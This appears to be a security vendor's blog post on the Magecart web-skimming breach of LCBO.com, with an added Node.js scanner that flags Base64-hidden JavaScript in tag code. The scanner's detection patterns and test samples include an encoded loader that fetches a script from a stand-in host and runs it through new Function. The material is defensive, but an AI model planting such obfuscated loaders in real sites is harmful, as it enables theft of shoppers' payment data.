The LCBO, a major Canadian retailer, recently experienced a cybersecurity breach that compromised the personal information of thousands of customers. The incident, which was discovered on January 10th, affected the client side of the company’s website, through which LCBO conducts online sales. It resulted in unauthorized access to sensitive information such as names, addresses, email addresses, LCBO.com account passwords, Aeroplan numbers, and credit card information.
LCBO has stated: “At this time, we can confirm that an unauthorized party embedded malicious code into our website that was designed to obtain customer information during the checkout process.”
The retailer said: “Unfortunately, customers who provided personal information on our check-out pages and proceeded to our payment page on LCBO.com between January 5, 2023, and January 10, 2023, are impacted.”
The compromised personal information, the company says, includes names, addresses and email addresses.
Experts identified the skimmer as a Magecart web skimmer. The injected malicious code sat inside a Google Tag Manager (GTM) snippet and was encoded as Base64 to avoid detection. Using legitimate tools such as Google services is an ongoing practice among hackers trying to avoid detection. Once the malicious script was loaded, it allowed the hackers to gain access to customer data from within the client-side environment. This highlights the importance of employing security controls on the client side to mitigate these types of risks.
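As an added illustration (not code from LCBO, Feroot or the original article), the following Node.js code shows one way a defender could audit tag or inline-script source for Base64 string literals that decode to JavaScript, the hiding technique described above. The indicator patterns, the 40-character and 95% printable thresholds, and the sample snippets are assumptions constructed for this example.

```javascript
// Added example: flag Base64 string literals in script/tag source that decode to JavaScript.
// Thresholds and indicator patterns are assumptions chosen for illustration.
const B64_LITERAL = /["'`]([A-Za-z0-9+/]{40,}={0,2})["'`]/g;

const INDICATORS = [
  { name: 'dynamic-script', re: /createElement\s*\(\s*["']script["']\s*\)/i },
  { name: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { name: 'network-send', re: /\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+WebSocket/ },
  { name: 'form-read', re: /FormData|\.elements\b|querySelector(All)?\s*\(\s*["'][^"']*input/i },
];

// Decode a candidate and keep it only if the result is almost entirely printable text.
function decodePrintable(b64) {
  const text = Buffer.from(b64, 'base64').toString('latin1');
  const printable = text.replace(/[^\x09\x0a\x0d\x20-\x7e]/g, '').length;
  return printable / text.length >= 0.95 ? text : null;
}

// Return one finding per Base64 literal whose decoded form looks like script code.
// Decoded text is rescanned (up to two extra levels) to catch nested encoding.
function scanScript(source, depth = 0) {
  const findings = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const decoded = decodePrintable(m[1]);
    if (!decoded) continue;
    const hits = INDICATORS.filter(i => i.re.test(decoded)).map(i => i.name);
    if (hits.length) {
      findings.push({ offset: m.index, depth, indicators: hits, preview: decoded.slice(0, 60) });
    }
    if (depth < 2) findings.push(...scanScript(decoded, depth + 1));
  }
  return findings;
}

// Constructed samples (not taken from the LCBO incident); example.invalid never resolves.
const enc = s => Buffer.from(s).toString('base64');
const LOADER = 'var s=document.createElement("script");' +
  's.src="https://cdn.example.invalid/a.js";document.head.appendChild(s);';
const SAMPLE_SUSPICIOUS =
  `<script>(function(){var p="${enc(LOADER)}";new Function(atob(p))();})();</script>`;
const SAMPLE_NESTED = `<script>var q="${enc('x="' + enc(LOADER) + '"')}";</script>`;
const SAMPLE_BENIGN =
  `<script>dataLayer.push({cfg:"${enc('{"currency":"CAD","locale":"en-CA","pageType":"checkout-confirmation"}')}"});</script>`;

console.log(scanScript(SAMPLE_SUSPICIOUS));
console.log(scanScript(SAMPLE_BENIGN));
```

A finding is a prompt for manual review of the tag, not proof of compromise; legitimate tags occasionally embed encoded script as well.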
The incident at LCBO serves as a reminder that no company is immune to cybersecurity threats. Defending against them includes regularly updating software, implementing proper security controls on both the server side and client side of applications, and properly training employees on how to respond to security threats, so that customer data is protected against e-skimming. In the wake of the breach, the LCBO has taken steps to address the issue and prevent similar incidents from happening in the future. This includes conducting a thorough investigation, updating software and security controls, and informing affected customers of the incident.
By staying vigilant and taking the necessary steps to protect their systems and customer information, online retailers can minimize the risk of a similar incident happening to them.
Protecting Against Magecart Attacks
If you’re an existing Feroot Security customer, you already have detection and prevention against client-side attacks such as Magecart, e-skimming, formjacking and others. Please ensure that alerts and controls are enabled.
Not a Feroot customer? Schedule a chat with one of our client-side security experts to see how you can gain better visibility into your client-side attack surface.